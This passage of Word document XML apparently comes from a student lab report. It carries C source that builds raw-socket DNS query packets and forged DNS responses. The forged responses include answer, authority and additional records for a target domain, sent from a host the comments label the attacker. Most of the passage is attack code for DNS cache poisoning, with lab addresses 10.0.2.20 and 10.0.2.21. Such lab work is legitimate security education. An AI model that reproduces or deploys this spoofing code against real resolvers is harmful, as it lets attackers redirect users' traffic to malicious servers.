          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p, domain_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5E3D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162CDF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strlen(domain_name) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683E67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2DB22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record type into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19831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6C64D1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(0x0002);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108929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918562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35AD35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E7D07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record class into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836649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BCCCA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(0x0001);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0391B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2FAB1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266C5A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E2493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time to live into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751EEE0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E9DC3A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int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htonl (0x00002000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568B4E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CF152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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F786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E2EEE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add value of data length into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3A7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7835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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*)p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) = htons (0x0017);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA1E5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129D31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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93954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D3D8E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//add nameserver into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3420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C45D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strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p, server_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F41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AFA8B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 += strlen(server_name) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8C97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B85AD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the current pointer position in the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BB45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53574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(p - buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01485CE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207AD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91610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E788E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2086E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88CCA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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>int argc, char *argv[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B51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86C57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This is to check the argc number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52EA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FC3E0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argc != 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E335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291157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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"- Invalid parameters!!!\nPlease enter 2 ip addresses\nFrom first to last:src_IP  dest_IP  \n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F11C9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6E2CD0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exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E18A1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87CA0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02BF4E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15EC0F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B1CCF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631E9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socket descriptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54990A8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35B32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sd;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26143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8E34FC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378B3E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8997A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buffer[PCKT_LEN</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>];  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/ buffer to hold the DNS query packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030CEA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192D06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reply_buffer[PCKT_LEN]; // buffer to hold the DNS response packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850C63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DD05C6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D75DF5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06EE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set the buffer to 0 for all bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6EE3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84CB19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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buffer, 0, PCKT_LEN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51465F0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3B944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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reply_buffer, 0, PCKT_LEN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45764C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66C0BA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A085A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D807B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constructure head structure for both DNS query packet and DNS response packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A60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F9F5A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ipheader *ip = (struct ipheader *) buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352CAF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A41F6E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ipheader *reply_ip = (struct ipheader *) reply_buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA79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9FA6A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6E6299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6D792D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udpheader *udp = (struct udpheader *) (buffer + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sizeof(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07288F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A0B977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udpheader *reply_udp = (struct udpheader *) (reply_buffer + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sizeof(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE593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717A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A768E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13DB9C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dnsheader *dns</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struct dnsheader*) (buffer +sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BC0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5F098A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dnsheader *reply_dns</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struct dnsheader*) (reply_buffer +sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DCAC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3F871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D1CCED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37988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data is the pointer points to the first byte of the dns payload  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E309A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F6DFC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*data</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buffer +sizeof(struct ipheader)+sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3BC6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68F46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 *reply_data</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reply_buffer +sizeof(struct ipheader)+sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61825F3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18BAB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631DF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26251E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0ED9DE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CF989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51D92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A77E0B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3F4EC4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1A30A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5CA032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1E728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dns </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fields(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UDP payload field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CD84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D241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428F6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286064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relate to the lab, you can change them. begin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACF5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8463E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9E4F41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F746B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049E50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DE317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C17D54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5DC3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//Code for constructing DNS query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27ED1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FBF0B6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dns-&gt;flags=htons(FLAG_Q); //set flag to be DNS query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F265BC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9B621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dns-&gt;QDCOUNT=</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1); //there are only one section, which is question section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0FF2A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DD2E7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data += set_Q_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data, SUB_DOMAIN); //set all field of question section of DNS query packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C426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79B51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length = data - buffer; //get the whole size of the DNS query packet payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82AEA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C72371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4B78C9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09A9C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//Code for constructing DNS response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683495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5A0E07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reply_dns-&gt;flags=htons(FLAG_R); //set flag to be DNS response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF79D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D80F8E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//there are four section in the response packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D995A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14FECF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reply_dns-&gt;QDCOUNT=</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1); // one question section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724153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F2F5A6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reply_dns-&gt;ANCOUNT=</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1); // one answer section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC3BD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880B5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reply_dns-&gt;NSCOUNT=</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1); // one authority section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB31B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E30C2B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reply_dns-&gt;ARCOUNT=</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1); // one additional section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAC0D9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6929C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//set all field of question section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182D0C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290FD2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 += set_Q_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reply_data, SUB_DOMAIN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C68F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16343C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//set all field of answer section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C6C7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4A8B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 += set_A_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reply_data, NULL, 0x0C, ANSWER_IPADDR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAAE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A258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//set all field of authority section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2744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7093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 += set_NS_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reply_data, TARGET_DOMAIN, 0, NS_SERVER);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1E9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CF388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//set all field of additional section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8EF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6B9CB0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 += set_A_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>record(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reply_data, NS_SERVER, 0, NS_IPADDR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ADCA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6366C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//get the whole payload size of DNS reply packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA488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ED012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reply_length = reply_data - reply_buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5112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A4F54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06A224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B1947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9AA76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14D70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B8A4C1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395C8D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4469DF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426AAE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A7827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E961E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DNS format, relate to the lab, you need to change them, end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E6B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FDA0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1F698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4AB1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88A769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F46F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659CF8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7BB1D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A6203E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D3CB8B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D8731B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8B7FF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0B907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54EE79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F175C1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E353FE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BE0DDA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CA32E3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B3023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D4C8A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Construction of the packet is done. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E22D3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90AB4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AABBB9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9482C2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now focus on how to do the settings and send the packet we have composed out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3AD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3B45B6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923259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46685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C0ED47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FFA25B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A85856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F5C2C9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Source and destination addresses: IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E278B1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0F392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struct sockaddr_in sin, din;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910AAE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F78D43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972A8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EB2A65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one = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A469A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C7593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59BA3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D2A4C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const int *val = &amp;one;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208D1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7624EB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173B32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ABC63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dns-&gt;query_id=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>); // transaction ID for the query packet, use random #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0F66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5A1B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6E557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76443A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Create a raw socket with UDP protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8454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B9153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sd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PF_INET, SOCK_RAW, IPPROTO_UDP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366F411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20B0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227965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3BFAD9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 xml:space="preserve">sd&lt;0 ) // if socket fails to be created </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72A0B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78B7A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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"socket error\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF80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55E79A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46E6C7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B44C94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8EBA3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F13FB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source is redundant, may be used later if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C261C5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D1AB6D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4E4F92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F37E72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address family</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA7D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AC16F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sin.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA409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48C136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CD0514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CAA68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din.sin_family = AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6330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B3E213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98C6C3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20F0F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Port numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C841C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8FCB8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sin.sin_port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33333);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180C7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47CD1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38A25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CD92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din.sin_port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53);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BE42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3BB63A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6EB21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572681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11167E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CC898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8C59E4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5591D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IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC79CB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D5307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sin.sin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>addr.s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_addr = inet_addr(argv[2]); // this is the second argument we input into the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B12E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65D6C0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907190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58B1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din.sin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>addr.s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_addr = inet_addr(argv[1]); // this is the first argument we input into the program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F95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45D3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FBD517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CEA21B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constructure the DNS query packet IP header </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D00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A0EC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ip-&gt;iph_ihl = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496228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EB6BB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349DB1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680BD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ip-&gt;iph_ver = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B90F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016689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6B66C0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F5B0AD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ip-&gt;iph_tos = 0; // Low delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC43E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85042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8FD17D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088A4FD" w14:textId="03DC221F"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packetLength </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sizeof(struct ipheader) + sizeof(struct udpheader)+sizeof(struct dnsheader)+l</w:t>
      </w:r>
      <w:r w:rsidR="00823967">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ength); // length</w:t>
      </w:r>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> == UDP_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E70D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1AC27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464C41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8C2C62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ip-&gt;iph_len=htons(packetLength);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633870F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7520F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230C4F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401963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ip-&gt;iph_ident = htons(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)); // we give a random number for the identification#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBBAE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6D24D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F2B943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5E2C8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ip-&gt;iph_ttl = 110; // hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AC0D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339DB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63556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7495BB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ip-&gt;iph_protocol = 17; // UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F832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67073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08CD4F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5D22D7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Source IP address of DNS query packet, it's the IP address of VM1 (attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B26269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1A4115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ip-&gt;iph_sourceip = inet_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>addr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"10.0.2.20");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A8C1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71CA1B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0741FF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1FB8C6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destination IP address of DNS query packet, it's the IP address of VM2 (DNS server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45B89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FC822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ip-&gt;iph_destip = inet_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>addr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"10.0.2.21");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3C23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CF3FE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AD26A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54DF4C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Fabricate the DNS query packet UDP header. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3EB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67275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75C4C1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ADF8C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udp-&gt;udph_srcport = htons(40000+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)%10000);  // source port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20160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2F8E5E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1998C7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AAE834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udp-&gt;udph_destport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53);  // Destination port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF10A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55F036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9116D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B0980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udp-&gt;udph_len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sizeof(struct udpheader)+sizeof(struct dnsheader)+length); // udp_header_size + udp_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4BE6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FC92D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3D3A3A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38E38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Calculate the checksum for integrity//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E7B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51F15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ip-&gt;iph_chksum = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
